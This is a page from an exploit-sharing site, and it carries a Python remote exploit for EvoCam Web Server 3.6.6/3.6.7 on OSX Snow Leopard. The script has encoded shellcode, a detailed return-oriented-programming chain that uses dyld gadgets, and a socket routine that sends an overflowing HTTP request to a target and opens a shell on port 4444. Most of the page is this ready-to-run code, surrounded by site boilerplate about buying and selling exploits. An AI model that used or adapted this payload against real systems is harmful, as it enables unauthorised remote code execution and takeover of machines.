0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)
[=======================================================
EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)
=======================================================
#!/usr/bin/python
# EvoCam Web Server OSX 3.6.6 and 3.6.7
import socket
import struct
SHELL = ( "\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24"
"\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2"
"\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71"
"\x64\x19\x94\x75\x10\xdf\xc6\x27\x70\x88\xe6\xc5\x65\x14"
"\x6f\x2a\xef\xb4\x3c\xfb\xa2\x04\xaa\xce\xc3\x17\x4d\x83"
"\x95\x85\x21\x49\xd7\xaa\x33\xd0\xb5\xf8\xe5\xbe\x89\xe3"
"\xc4\xbf\x98\x4f\x5f\x78\x6d\xab\xdc\x6c\x8f\x08\xb1\x25"
"\xc3\x3e\x6f\x07\x63\x4c\xcc\x14\x9f\xb2\xa7\xeb\x51\x75"
"\x17\x5c\xc2\x25\x27\x67\x2f\x45\xd7\x08\x93\x6b\xa2\x21"
"\x5c\x31\x81\xb2\x1f\x4c\x19\xc7\x08\x80\xd9\x77\x5f\xcd"
"\xf6\x04\xf7\x79\x27\x89\x6e\x14\xbe\xae\x21\xb8\x93\x60"
"\x72\x03\xde\x01\x43\xb4\xb0\x88\x47\x64\x60\xd8\xd7\xd5"
"\x30\xd9\x1a\x55\x01\x26\xf4\x06\x21\x6b\x75\xac" )
WRITEABLE = 0x8fe66448 # Writable address - dyld
STRCPY=0x8fe2db10 # strcpy() in dyld
# ==================== Put stack pointer into EAX/EDX ====================
ROP = struct.pack('>I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the writeable value below
ROP += struct.pack('>I',WRITEABLE) # Required Writeable address here for exploit to work
ROP += struct.pack('>I',0x8fe2fb63) # pop eax # ret - needed for command two below
ROP += struct.pack('>I',WRITEABLE) # writeable address to pop into eax for instructions below
ROP += struct.pack('>I',0x8fe2fb58) # push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret
# ==================== Jump Over Parameters below ====================
ROP += struct.pack('>I',0xffff1d6b) # add esp,byte +0x1c # pop ebp # ret
# ==================== strcpy call ====================
ROP += struct.pack('>I',STRCPY) # use strcpy to copy shellcode from stack to heap
ROP += struct.pack('>I',0x8fe2dfd1) # POP - POP - RET over strcpy params
ROP += struct.pack('>I',WRITEABLE) # Dst Param for strcpy
ROP += 'EEEE' # Src Param for strcpy - Placeholder
ROP += struct.pack('>I',WRITEABLE) # Move execution to where we moved our shell
ROP += 'C'*12 # Padding
# ==================== Craft Parameter 2 ====================
# Need to inc EAX or EDX to point to shell code
# Store 0x10 in ECX
ROP += struct.pack('>I',0x8fe2dae4) # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
ROP += struct.pack('>I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the value below
ROP += struct.pack('>I',0xffffffff) # Value to store in ecx
ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
# Replace stack pointer back into eax as it was trashed
ROP += struct.pack('>I',0x8fe2c71d) # mov eax,edx # ret
# Add offset to paramter
ROP += struct.pack('>I',0x8fe2def4) # add eax,ecx # ret
# Swap over so we can work on fresh copy of saved ESP
ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx
# Increase ECX some more times to point to our nop sled/shell code
ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack('>I',0x8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack('>I',0x8fe24b3c) # add ecx,ecx # ret
# Add offset to shellcode
ROP += struct.pack('>I',0x8fe2def4) # add eax,ecx # ret
# Swap back
ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx
# Copy parameter to placeholder
ROP += struct.pack('>I',0x8fe2fb61) # mov [eax],edx # pop eax # ret
ROP += 'G'*4 # junk to pop into eax
# ==================== Call strcpy function ====================
# Set our Stack pointer back to original value
ROP += struct.pack('>I',0x8fe0e32d) # xchg eax,edx
ROP += struct.pack('>I',0x8fe2daea) # sub eax,ecx # ret
# Return execution to our strdup call above
ROP += struct.pack('>I',0x8fe0b1c2) # xchg eax,ebp # inc ebp # ret
ROP += struct.pack('>I',0x8fe2b6a5) # dec ebp # ret
ROP += struct.pack('>I',0xffff01f3) # mov esp,ebp # pop ebp # ret
ROP += 'G'*4 # junk
# ==================== Exploit code to be copied to heap ====================
NOP = '\x90' * 10
BUFFER = 'A'*1564 + ROP + NOP + SHELL
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.10',8080))
print '[+] Sending evil buffer...'
s.send("GET " +BUFFER + " HTTP/1.0\r\n\r\n")
print "[+] Done!"
print "[*] Check your shell on remote host port 4444"
s.close()
# 0day.today [2024-11-15] #